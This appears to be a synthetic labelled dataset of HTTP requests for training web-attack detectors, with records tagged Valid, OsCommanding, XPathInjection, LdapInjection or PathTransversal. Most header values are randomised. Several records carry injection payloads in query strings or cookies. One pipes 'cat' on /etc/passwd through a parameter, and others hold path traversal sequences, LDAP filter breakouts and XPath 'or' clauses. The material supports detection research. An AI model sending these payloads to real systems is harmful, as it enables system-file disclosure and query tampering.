If-None-Match: *
If-Range: Mon, 05 Dec 05 12:05:04 CET
Max-Forwards: 50
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Digest response="c72F6f974FCDBcBE3cbCaA8bB6EBE6b5"
Authorization: NTLM ZmZwbGluSGhhZG1yWXdDZGVyZW5lZHNhZDlyaW5lbG1OQXNna0xlbG1iZ20=
Range: -63,010806-6
Referer: /40nt/iyumLi/leu0a8e/ieaiee.js
TE: trailers,trailers,chunked
Trailer: Accept
User-Agent: Mozilla/2.3 (Windows; U; Win 9x 4.1; ot-ng; rv:4.3.9) Gecko/84894526
UA-CPU: x86
UA-Disp: 3449,787,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0846x910
Via: 5.0 17.38.213.65, 0.5 192.105.225.11
Transfer-Encoding: y2dal
Upgrade: tg2r/9.0, fere/5.1, Samd/0.1, iasFl/4.6
Warning: 508 www.Wowebu.shtml "eitda3tdi4a9" "Wed, 29 Mar 06 15:01:52 GMT"
X-Forwarded-For: 129.43.76.8
X-Serial-Number: 912336
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 11720
Start - Id: 5011
class: Valid
POST /nfNotte/0t@zV596De6c/o4vioThdBt1phTeri6/gvvaQf_8/5ani0tgatoYorlfmteod/ajptc0gles/evalYZg2C.jpg? HTTP/1.1
Content-Length: 174
Content-Language: jouese
Content-Encoding: compress
Content-Location: http://psfytun.be/lineto/jhpeuiCT/aerh/dogn/rnhn.swf
Content-MD5: b3JzcmVvZGF4U2hodUNyOA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 08 Nov 08 21:15:07 GMT
Last-Modified: Sat, 01 Dec 07 15:27:44 UTC
Host: 11.215.84.66:94418
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: nrmf8-Enpyt, eegnl4-nsyc;q=0.7, ics0gdw-crop;q=0.2, oo-sa
Cache-Control: no-cache
Client-ip: 90.156.153.96
Cookie: oymru=enRnl;1LDD6=eN6mKVBhZQP
Cookie2: $Version="12"
Date: Mon, 13 Jul 09 16:43:20 UTC
ETag: W/"RxD8upuX4WwDQOW"
Expect: niosjao
From: anypee@kdrqiteI.it
If-Modified-Since: Mon, 26 Jul 04 03:34:39 GMT
If-Unmodified-Since: Fri, 31 Jul 09 23:38:06 CET
If-Match: "x1VMoMP8fPZHl1qb"
If-None-Match: *
If-Range: "62-WLVzs2qrDDNJc1cbd"
Max-Forwards: 8775
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: n0uh sdoatsos=ryyw9
Range: 8-,-38,-9633
Referer: http://www.sqsobstm.org/hmwUn0tu.swf
TE: trailers,chunked;q=0.3
Trailer: Trailer
User-Agent: Mozilla/3.5 (Machintosh; U; PPC 2.1; ih-ha; rv:1.7.0) Gecko/75061591
UA-CPU: StrongARM
UA-Disp: 770,4092,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5947x3710
Via: 3.9 www.dSsi.jpeg:807, 0.4 57.250.88.49, tIu5/7.6 www.mdra.jpg:52
Transfer-Encoding: gzip
Upgrade: clytr/8.8
Warning: 459 www.stfkt.css:00 "enygOrouo8ussoypt" 
X-Forwarded-For: 3.243.104.229
X-Serial-Number: 03530
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

uo=eer3gn&drEssv=:~0fciEipt-aEal&hmansdice=mCgnAvw&VoptRn= dehU accept16e|iec&flKrR6=sa8iFE8rths9t4&bhtdEaaambe=8yoi%unesE&ubtyiaaoeYaje=zs@Do88bn&I1eUs9lftUa=97982

End - Id: 5011
Start - Id: 43421
class: OsCommanding
GET /DDMFPAQbTexecCjz/u5utkj/nemethntcel3rph/5J-4V08UbH6_ZH/lfnsf/xrY/ntxdm1fJ1N9sjSyMdX/i.q_nIbH9vkPQ/unrd5aeeroanmtsene4/oBcpG2sA2z8Efz/iet.jpg?bzeyaDnraptszm=%7C+++cat+++++..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd+++%7C&hw=i7n HTTP/1.0
Host: www.rrhana3.cz:742
Connection: remcrdin
Accept: application/x-tar;q=0.6, application/*;q=0.7, text/xml;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 115.151.244.56
Cookie: heoeoedmsnnY=24840;3lTdh=ocnmOt;rsf3=356;i2fr8ha=4987416;Wyrwe=afyxp_betweena zhann cWef;rr0xast=7
Cookie2: $Version="4"
Date: Sun, 11 Dec 05 22:47:38 GMT
ETag: "4NsrfC_QJwuMw5JBGe"
Expect: oteD40
From: eM8p@ehnasbf.it
If-Modified-Since: Sat, 15 Sep 07 20:03:13 UTC
If-Unmodified-Since: Sun, 25 Jul 04 22:06:29 UTC
If-Match: *
If-None-Match: *
If-Range: "XVF7v0palxOKh_Xy"
Max-Forwards: 150
MIME-Version: 7.3
Pragma: lsryt=e6i
Proxy-Authorization: gzsvp te7ry=Aixdorbe
Authorization: Digest qop=auth
Range: 5130-,89497-47998,93-50140
Referer: /prvwt7/sni6.rar
TE: chunked;q=0.2
Trailer: Warning
User-Agent: Mozilla/9.0 (Machintosh; U; PPC 4.2; 3i-bY; rv:3.9.3) Gecko/42252771
UA-CPU: 68000
UA-Disp: 2710,0982,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 319x516
Via: 7.5 www.lijtnu.tiff, HTTP/2.8 www.onathee.png:92, 3.8 www.uRHvelq.css
Transfer-Encoding: gzip
Upgrade: Oed/2.9
Warning: 068 www.nEtms.tiff:791 "hzcetNt0o1a8aftr" "Thu, 03 Dec 09 09:45:12 UTC"
X-Forwarded-For: 15.27.14.91
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43421
Start - Id: 27512
class: Valid
GET /vAldM3/el4d9ezz.html?dcfiA93t=ve7rassock_stream%40S&AKxBHEucND=0y HTTP/1.0
Host: www.cqnD.biz
Connection: aoEst68e
Accept: video/quicktime
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.7, compress;q=0.0, compress;q=0.4
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 240.72.18.67
Cookie: ZlinkperlE9ohavingk8replaceA=olF
Cookie2: $Version="1"
Date: Wed, 11 Oct 06 21:16:27 UTC
ETag: "fvjWGc7zSZjCcXPT"
Expect: me45h5b
From: Ifxyn@cystcefu.uk
If-Modified-Since: Mon, 09 Jul 07 06:47:04 UTC
If-Unmodified-Since: Wed, 30 Jun 04 10:11:34 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Sep 08 19:50:10 GMT
Max-Forwards: 825
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic ZW9mbW9uZDpvZG85
Range: 1237-98,8233-,5148-10
Referer: http://t7sanrnE.fr/nincat/t2Toe/cTsLan.png
TE: chunked;q=0.0,gzip,chunked
Trailer: Proxy-Authorization
User-Agent: chatgcip5znseamd
UA-CPU: PowerPC
UA-Disp: 883,733,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5041x3321
Via: HTTP/4.2 www.2ttoeiwt.jpeg, grha3/4.0 www.ahUadek.png
Transfer-Encoding: uotUnv
Upgrade: ieiie/4.6, kord/5.1, Nat/2.2
Warning: 561 www.Nlensr.png "s0qusp6lni" 
X-Forwarded-For: 102.128.80.116
X-Serial-Number: 8783234451
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27512
Start - Id: 49427
class: XPathInjection
GET /1QGkhWh4Lyxo.cRgrS./psgenslieiah2eh6ena/lfAEinwyee.cfm?iMYAM7pwf=snbotmIenfRt&elrahnbmBdoep=%7Es&eeAhoeph3q5yppt=sxS5ifatec7ih88peg&dbar=0&ge3Lcltfya=6417&tEo108dtetiee=11&eznft=vhRcypef4ntzaa277m&ee0tet9eqj=520&smhArssnufsstet=204&jNlggpefiiae=185++or+as%2FjboHhL%2Frxote%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D97%5D++++or+++275%3D&tcnnnsrrydnaleH=5024330940&jTlo0fcTtormi8r=37&tqwsayR1ohb1=enY&binQst7zVu=6loge5&i5Band=oaweutou HTTP/1.1
Host: www.6reealrd5e.uk
Connection: eOden
Accept: image/jpeg;q=0.0, image/jpeg;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: kd-Iegresu, oz-vliiwn7;q=0.5, mggj-9oaewn;q=0.7
Cache-Control: i=33
Client-ip: 14.210.151.203
Cookie: ee8tpildahinla= ia
Cookie2: $Version="722"
Date: Tue, 31 Aug 04 12:01:06 UTC
ETag: "9EJy05E0HvEXhGvYe"
Expect: 8Usetdir
From: lyE3Znu@romta.biz
If-Modified-Since: Mon, 03 Jul 06 19:19:29 CET
If-Unmodified-Since: Sat, 25 Oct 08 01:35:51 CET
If-Match: "KcPEIEblBQ-CmKz_cXNo"
If-None-Match: "DH14wSY@1m_Vmjij6"
If-Range: *
Max-Forwards: 53
MIME-Version: 0.6
Pragma: rp='aa8d'
Proxy-Authorization: Basic dG5FdDU6c2VmZnRldGE=
Authorization: o3ae hmns=Egpoigcn
Range: -32,-92418
Referer: /elhsZ1r/itsaEO9t.cfm
TE: chunked
Trailer: Warning
User-Agent: Mozilla/8.8 (Machintosh; U; Mac OS X 8.9; on-cs; rv:7.3.8) Gecko/93352804
UA-CPU: StrongARM
UA-Disp: 247,139,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5208x110
Via: HTTP/2.3 www.i6SXrT.jpeg, nokpv/3.5 157.146.130.204
Transfer-Encoding: gzip
Upgrade: 7wfie/1.9, qn3h0/6.3, fiEx/5.9, lho/6.1
Warning: 168 www.mBsttTo.jpg "zsvb" "Fri, 02 Nov 07 10:06:41 UTC"
X-Forwarded-For: 43.207.47.88
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49427
Start - Id: 37127
class: LdapInjection
GET /OiHyoago4gaftnqo/dk/sy7oteArrzb/o8zFlG/06yUz.7vy6xtj/s0IQvmW_a/0eRLsONttoo/tafhkuhiefnatrqzmrrd/m1GNw7k@igQ/yLvcza4tA63X/l3Yu2PfB/eeieicotnp0nsay.swf?txXToN9HS5u=eash%29%28%26%28objectClass+%3Dgoe*%29 HTTP/1.1
Host: www.eqorel6men.fr
Connection: close
Accept: text/xml, audio/x-wav;q=0.9, audio/*;q=0.2
Accept-Charset: iso-8859-15, windows-1254, windows-1255
Accept-Encoding: 
Accept-Language: de-cllosLta;q=0.1, eqapR-EDee;q=0.5
Cache-Control: max-age=9832
Client-ip: 55.97.57.216
Cookie: 0hnreid=aeeoav2ep0tliohBSc;ssIse6cheteaid=Aorwb77etsasth
Cookie2: $Version="74"
Date: Mon, 25 Aug 08 16:17:57 GMT
ETag: "vNIt9YlB_Kqpv93dComl"
Expect: seeuhtcr
From: ke6iat@otEmem.org
If-Modified-Since: Mon, 31 Jul 06 20:06:49 GMT
If-Unmodified-Since: Wed, 02 Aug 06 24:10:05 GMT
If-Match: *
If-None-Match: ".kf_KyC@ctRwzdYhEfrw"
If-Range: Tue, 06 May 08 14:13:30 UTC
Max-Forwards: 389
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: see9 isegk=eecbta
Range: -5173
Referer: http://www.rdta.fr/free/iatSah/lhfltD/efimzxs/2t5esi.sh
TE: gzip,deflate
Trailer: Accept-Language
User-Agent: nCdHmQ1 http://www.oeipeDzl.com
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: HTTP/7.7 123.200.210.102
Transfer-Encoding: identity
Upgrade: tRvc9/2.0
Warning: 985 www.hortt.htm "epvsa7dt6thxel" 
X-Forwarded-For: 251.177.162.12
X-Serial-Number: 4738976742686812
----: ---------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 37127
Start - Id: 14760
class: Valid
GET /1iIasrt3Piu/aGqlVHsyyN.php4?e2ho=nheo&nlwnrsCr4pzdesi=2&aT5var8sJl=Viframef5%3D4&tdwi4eItaaefngR=153&qBN3IWd7qB=seoseSit&mltih=rY28SS&n5Jv=vwWARC&geihliTohr=MsinsertnzwRta%27exVnn+&Ofa=oREe&oHjtT3DL=090169017&rirn2bcYak=4429&el8n=6328661 HTTP/1.1
Host: 80.7.99.230:80
Connection: close
Accept: video/mpeg
Accept-Charset: iso-8859-5, iso-2022-kr, iso-2022-kr
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 251.25.146.32
Cookie: x3kGo=imtui
Cookie2: $Version="7"
Date: Sat, 12 Jun 04 02:50:47 CET
ETag: "APGpywQRqorY-BwL"
Expect: 100-continue
From: owsogmh@sdEtisrsme.org
If-Modified-Since: Fri, 21 Jan 05 04:01:34 GMT
If-Unmodified-Since: Sun, 10 Jun 07 20:20:04 CET
If-Match: *
If-None-Match: *
If-Range: "ZTGVjf@V7a9mnet3W"
Max-Forwards: 2063
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: el3ew eon38=myylbi
Authorization: Digest nc=d9e25cee
Range: 31145-
Referer: http://toaie.ch/VDtc/t4ahwoni/s5e3e.jpeg
TE: trailers,trailers
Trailer: TE
User-Agent: Mozilla/2.8 (X11; U; SunOS sun4u 4.8; tn-tp; rv:2.3.8) Gecko/39938071
UA-CPU: Sparc
UA-Disp: 1839,4933,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 888x837
Via: HTTP/7.3 www.hBalr.tiff:13125
Transfer-Encoding: deflate
Upgrade: 538l/6.3, Nej3/9.2, fin/7.2, tEMO/5.8, fosep/7.7
Warning: 068 www.th4ir3.htm "lsnwNndt" 
X-Forwarded-For: 99.254.129.225
X-Serial-Number: 0800772649
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14760
Start - Id: 44927
class: PathTransversal
GET /tYLeX/pIhbYu86Ik/hracdoNshb4iauacW/NeaiE0/fxztPb.xVRlcLY@/oadosyeA7ixottaa/iGtmppnetcatbetweenNwandRK/DDOoS_fdUVOz45Q/tayvhsrm.html?223yANCV=cehilheqrt&TcmdWP@wq=eyhro0dniRdpryye&QMF0acceptyFUWwinnt=bsSsndrwdr&EyYLMndwindow.openZV_h=etnd0aoezwo&aepensHsyxti=Eetc4es5nntclyi32a&9amtd7tmzss2hg=5ehtaPto&RTS5ZfCw-0=rDo38bDC_O&TwnxmldDyDncmailbody=71673284&aeveVmsoDsk=z+etc%3Ae%25&neAct=%252e%252e.%5C%25252f%2F%5C%25252f%2F...%5C%25252e..%252e&o9J5m60.K6I=8060778 HTTP/1.1
Host: 176.60.153.184
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: tfd-W, taeZ-s
Cache-Control: no-store
Client-ip: 210.224.126.37
Cookie: ynno8tTi3e0gofc=3wbody;thajtoao=(eayiframeulZetnlink;tg=iltaweqltio;yiecdt8eh=ohhlibredi0fd$io&replaceqjr
Cookie2: $Version="10"
Date: Fri, 04 Jul 08 01:31:38 UTC
ETag: "s3X2xyY4nbloQUM2pt6"
Expect: 100-continue
From: erlpd29@hbwsenumTc.de
If-Modified-Since: Mon, 21 Mar 05 10:10:53 GMT
If-Unmodified-Since: Sat, 27 Jun 09 17:14:53 GMT
If-Match: "bYmRxm3JoHIIpH8Cv3"
If-None-Match: *
If-Range: Mon, 01 May 06 03:35:35 GMT
Max-Forwards: 6672
MIME-Version: 6.2
Pragma: 3iys5e='4jtl5'
Proxy-Authorization: Digest response="98F2FadAed0C8DFfeDEa1A54Dbbba32e"
Authorization: NTLM dGFlZWVIYmplZXJuZW9ob25lZHRlb3JoaXRydXdvQTdhdGFXMXRuaW5qYVM=
Range: -044,-5960,-6
Referer: http://www.Eonaggi.fr/thbezss/2soah.zip
TE: chunked;q=0.4,gzip;q=0.0,gzip
Trailer: Cache-Control
User-Agent: Mozilla/6.2 (X11; U; Linux i586 4.4; wm-nt; rv:4.2.1) Gecko/58444601
UA-CPU: StrongARM
UA-Disp: 8119,252,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 0076x7912
Via: HTTP/2.3 254.213.30.94, 4.8 www.Hwcseaho.gif
Transfer-Encoding: identity
Upgrade: hrs2so/5.1, hiaaa/2.1, n3bee/7.6, irnbn/8.7
Warning: 627 www.luad.js "7atl" "Sun, 01 Jul 07 05:55:47 CET"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 26239729900877789790
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44927
Start - Id: 4191
class: Valid
POST /8G2mQCa@2vbscriptvps7j/LS/tT5FFn/aHFmQBb_.ABo/s2RLy0jcDVZ9j/pPrFNEP/CR10Uk1MyM/SifRrut0h09nc/undt2mTbresdrts/rI98GK8lI@eyDPOx/dmKQHmbxN5orNs8/rC3QHRm.css? HTTP/1.0
Content-Length: 17
Content-Language: Ree,RddbW
Content-Encoding: identity
Content-Location: http://8oo5re.st/o2i6ol/emux/trdclEJn/sgstgfon.zip
Content-MD5: YWFuNXRiY3o3YWVzaXlydw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 21 May 04 10:23:14 CET
Last-Modified: Thu, 13 Dec 07 12:48:27 CET
Host: www.yiOio96e.net
Connection: 1J4tm
Accept: application/zip;q=0.1, audio/x-wav;q=0.3, application/rtf
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: ued-cA8r, 4eStiNSe-efbilr, 3-aEovfoe;q=0.1
Cache-Control: max-age=2
Client-ip: 41.163.178.133
Cookie: ar5BatmpD=)cy;pPdCI2nq2ftp=6an ps0aermm;mHvkSpBz=e30Ln4NA6c-;ocPp8=1637;aahteh9Yeelsoo=0300;etLjiodcoeedh=c>aechoii~doy ti9Fo allrr
Cookie2: $Version="21"
Date: Sun, 15 Jan 06 15:07:02 GMT
ETag: W/"Xgxu6V2es.OOZX.Oc"
Expect: 6xsMd
From: tewe@gFoteninnd.com
If-Modified-Since: Tue, 18 Nov 08 03:49:01 UTC
If-Unmodified-Since: Tue, 20 Nov 07 11:47:38 UTC
If-Match: "Qv6P5ERF0Dx3tJTrKjk"
If-None-Match: *
If-Range: *
Max-Forwards: 0951
MIME-Version: 8.9
Pragma: zl='eTs'
Proxy-Authorization: NTLM ZmRTY2xhVHQ5Y25zbzZyZXRuaWQzbHJ1ZWFpaTFuYWx0c3VpdGlyNnVkNTRl
Authorization: NTLM MkV0aXl0bFNzMzZ0N25iZmh3Y1VzZWVjc245Z2Jlbm5uZXI=
Range: 6-,-5947,21-
Referer: /in3t4t/bnsa32pn/eeso/1Ais/rovh.php
TE: chunked;q=0.9
Trailer: Referer
User-Agent: Mozilla/2.6 (Machintosh; U; PPC 4.0; gt-yv; rv:4.6.4) Gecko/39949821
UA-CPU: x86
UA-Disp: 1201,427,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 820x313
Via: 0.1 www.eg5tna9.js
Transfer-Encoding: identity
Upgrade: hoPa/4.4, Rhih/0.5
Warning: 509 32.174.131.157 "blmx" "Mon, 22 Dec 08 02:53:51 GMT"
X-Forwarded-For: 145.194.83.222
X-Serial-Number: 70476
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iN4psIwct= [dZ9

End - Id: 4191
Start - Id: 16838
class: Valid
GET /JUMUbwp-Ygwv/tZt0zias/jc-H/egMI_k0MaTGvLB/e4I0yDGI0W/mamL9Tirw1/LuE6P_/mDaZMbmCh8pqa_Uw.r_s/snee5rrnmerlteaaau3/9JWM-311G/uJhBqAfJkoP-dxx.gif?lanug=ip%3El9Ye&lxreerEs=nmRN&ate=having6wlnvitdmprtos HTTP/1.1
Host: 131.221.103.44
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.8, identity;q=0.6, deflate;q=0.5, deflate, compress
Accept-Language: ete8e-ehdsu;q=0.2, vpi-etel;q=0.3, hiesmU-rairM, ra-yzt4wNp, hnvat-hch;q=0.0
Cache-Control: leRraoe=h
Client-ip: 48.227.50.69
Cookie: orcoba4dce=421;os3o=lfaes1Ni5onmfrdth;esHeullh=2d bl-tlOrio0rt;uiloleetaM=t71ey
Cookie2: $Version="8"
Date: Wed, 18 Aug 04 09:21:02 CET
ETag: W/"Wa7DiGdQO8WrhO@W"
Expect: 100-continue
From: sLreap3i@a64Yedt.be
If-Modified-Since: Sun, 07 Mar 04 20:48:06 CET
If-Unmodified-Since: Fri, 26 Feb 10 21:43:15 UTC
If-Match: "ZBzmu5uYPWXaY7nJ"
If-None-Match: "B6ue1RHk.y5xpb7xIUNv"
If-Range: Tue, 08 Sep 09 24:37:45 GMT
Max-Forwards: 0039
MIME-Version: 6.6
Pragma: plsthTg='okt'
Proxy-Authorization: Basic YW1lc25oMTpPcmgx
Authorization: NTLM aWV4aGFmY2RhY3lyZXNzRTV5bFkwZXRkcmxldTVidGZl
Range: 4337-02,7-
Referer: http://qcnstesf.uk/spRt/ieeii/ulnnsit/tesw.gif
TE: chunked;q=0.8,deflate,trailers
Trailer: If-Range
User-Agent: trOoFntee (xthclJU2_; bFfC.5dAZ)
UA-CPU: Sparc
UA-Disp: 952,004,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 818x5345
Via: 1.9 www.dces7m.js, 9.0 20.216.24.94
Transfer-Encoding: identity
Upgrade: IDaaec/9.5, tkiame/5.5
Warning: 175 www.72ntce.js "kngnaee" 
X-Forwarded-For: 244.9.245.19
X-Serial-Number: 60090044663
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16838
Start - Id: 38367
class: LdapInjection
GET /rn839JfIq-MqF8l6/tAdWuq/tehesnucpgkrceime7a/zbp/UnsaLptel2z/nciwfjX7OGBNRfB@/K7ZD@5GTeTS/tudm9.jpg?ykni7aqnhv=876261130&0naiRax0=1Sqhnlti&lKw0rFsRo=4988446364&eq=uXQsE2Ja89&es=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&-hC7r5Tur=i8seIb&CR12mU9Tz=g&oorjEEht=%27+iDshNte%3Bim&JxJ7ID=etX&lwrgzaohmi=908644 HTTP/1.0
Host: www.sirslaOni.ch:567
Connection: close
Accept: */*;q=0.2
Accept-Charset: iso-8859-3;q=0.4, cp-932;q=0.1, cp-932, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: zleshl-9n51ogt;q=0.2, Njes-vPSesrtm
Cache-Control: no-store
Client-ip: 193.201.183.61
Cookie: eystheuhi=955061;eaeinh5rk3qte=d)eaa(h;upirozlrebller=l~1 gineeallb htrflsopt&a;0sr=tBLcSI;9at=rs  rwindow.open7>-;cmdkad=veFoo
Cookie2: $Version="3"
Date: Wed, 24 Oct 07 14:19:23 CET
ETag: "XdKqihpT_MZZjEK6G"
Expect: 100-continue
From: frlm@ctsi1ez.ch
If-Modified-Since: Fri, 27 Feb 04 02:01:10 GMT
If-Unmodified-Since: Wed, 19 Dec 07 21:49:55 GMT
If-Match: "d3QqBsEjQtALlk0wU"
If-None-Match: *
If-Range: Wed, 24 Nov 04 12:17:25 CET
Max-Forwards: 548
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: agin 7Gqd=SEesnE
Authorization: NTLM c2VlaXpvdDN4bjdTdXUzZnJhYW1kb3VmZXJsdnFzd2l1aWVFTmw=
Range: -0,582766-
Referer: /rru8nXt/tatuboe/reureva/yTtt/tre35.dll
TE: chunked
Trailer: If-Unmodified-Since
User-Agent: Mozilla/3.3 (compatible; Konqueror/5.5; Open BSD i586; eeseNqsa6s; otuh)
UA-CPU: 68000
UA-Disp: 8585,869,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 231x314
Via: 6.1 www.tsBshuqe.htm:7946
Transfer-Encoding: 7Sni
Upgrade: ooh/1.6, rCeq/8.8
Warning: 242 www.rnh0htla.jpg:8 "nyednaRaaanaige" "Wed, 12 Mar 08 13:13:41 GMT"
X-Forwarded-For: 251.153.108.27
X-Serial-Number: 9579642646846
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38367
Start - Id: 50065
class: XPathInjection
PUT /etoE1ia4nntei6e/rWUnNU_kqc0/djjr27k4qxDo/wPT_qdh/iG-/86servicesM@n/fgqhludeuibetmne/iritstdppp0c/0aCWSWbAW.gif? HTTP/1.0
Content-Length: 220
Content-Language: tcu,hzl1caon
Content-Encoding: compress
Content-Location: http://s0aow.fr/sr8seevL/esbncfhs/Uneitl/aaty5iq.html
Content-MD5: aWFyY2tiVG5naUpmdWFuaA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Sep 04 07:23:04 UTC
Last-Modified: Tue, 09 Mar 10 06:23:58 CET
Host: www.hyero.org:963
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate, deflate;q=0.3, identity;q=0.4
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 9.5.7.184
Cookie: iLe=hd;8iafear=1655     or  count(path/child::node()[position()=((i+j+k+l+1)]     |     path/child::*()[position()=(k+1)])=1   or  8692=
Cookie2: $Version="1"
Date: Tue, 13 Sep 05 06:47:12 CET
ETag: "wwVJHiufI9QTa0P"
From: btorof@elber.it
If-Modified-Since: Fri, 21 Jan 05 02:21:28 UTC
If-Unmodified-Since: Sat, 26 Aug 06 07:10:16 GMT
If-Match: "W8Ke73OZmQ2xg9.t4"
If-None-Match: "hK8_Gs4vU2QbB6kQV"
If-Range: *
Max-Forwards: 97
MIME-Version: 2.6
Pragma: Rkwy0jI='r'
Authorization: Basic cWZlSTpsZXZTeGc=
Range: -38344,41-
Referer: /cats/omruum/tanWgtR/5pokr0he.tar
TE: deflate
Trailer: If-Match
User-Agent: Mozilla/2.8 (compatible; alazot4ee; Linux i386; mHvmeeni)
UA-OS: Mac OS X
Via: FTP/9.9 29.13.161.47, 0.0 205.158.222.224
Transfer-Encoding: gn1o; hTss=orfei
Upgrade: nteEi/0.1
Warning: 123 196.148.158.182 "Ymsriob8iitrsuaoTn" "Sat, 17 Jan 04 13:32:01 GMT"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

md=]E&drd=49248314&dxohailaen=aRjnI&axlqiuag=cfandttnDia1&id=de3sosiad&nhLNvrhg=kea-&ro7i=y&hhcEtn393d3aeee=02&hqudlus=78061&frufslsttc=0419986339&tIlTfn=il269gLBteN&hsi=t1e0etdseet&qG5libB_=nQtQ2-jsG&pm=n:+atnodeE

End - Id: 50065
Start - Id: 738
class: Valid
GET /onzgdLinb7erge/up-jU6i1usr4/rx/n0rtffarTS19e/cilsxw8mc/UoSWMW2XscripthA/hhl1edufaoatoeeh6t/4a/nl4/a49noc6fyyrnUnz9/2N.png?rbhw9=neerrn+Ls&irccne=oimn1lsLcs7&7T9aijawld=esaOs&lhgra2jnl=hbi+MU&s4feitmBltoon=r-1kc8Jg9K HTTP/1.0
Host: 83.162.68.151
Connection: opot
Accept: */*
Accept-Charset: windows-1253;q=0.3, windows-874
Accept-Encoding: *;q=0.7
Accept-Language: qNWdls-anttt, ean-iqh;q=0.2, nt-yoe, de-otrtdxiA
Cache-Control: no-store
Client-ip: 17.204.45.180
Cookie: 2qogadosc=(@us y e;oos5=tqFit:enph-aukajta(r i
Cookie2: $Version="6"
Date: Mon, 09 Aug 04 16:37:01 CET
ETag: "mXqzusF5UMEWVN9kjdqZ"
Expect: ullec8ii=asBEe
From: eet5ayi@trifo.it
If-Modified-Since: Wed, 01 Mar 06 03:57:23 GMT
If-Unmodified-Since: Sun, 06 Dec 09 03:24:32 GMT
If-Match: *
If-None-Match: *
If-Range: "2yVMuxgdm_@XqSs"
Max-Forwards: 4636
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: cll2 orUtkN=3ekdTnt
Authorization: Umteuh 4aztS=t9ee
Range: -523,85-12956,5-
Referer: /sii8mao/a1eas/otu4g/ynfsoeq/ear6r3.jpg
TE: chunked
Trailer: Cache-Control
User-Agent: eXYRUwqX http://www.xccscr.de
UA-CPU: PowerPC
UA-Disp: 573,0887,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 180x0493
Via: 5.3 www.iRteoE.gif
Transfer-Encoding: ItEv; aSnl=Sa252ud
Upgrade: sNnb/0.0, sioc/7.0, inmmI/4.9, btat/9.8
Warning: 228 194.43.243.100 "i6jamotratateptotni" "Wed, 18 May 05 23:53:22 CET"
X-Forwarded-For: 161.122.52.147
X-Serial-Number: 93643715555060287385
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 738
Start - Id: 16433
class: Valid
GET /oQzjtmKx1e/ysruahmtO5t/bar6nsidxekhlu4fvuw.js?juam7pTn=c&SVe7lrlrijfkd6u=tfmlr&kiw2eteHatqEovd=ejhro&7herwyzdvoEjyk=stioeoECrwRp HTTP/1.1
Host: 157.5.88.158
Connection: 2dt4e
Accept: text/html, video/*, image/png;q=0.8
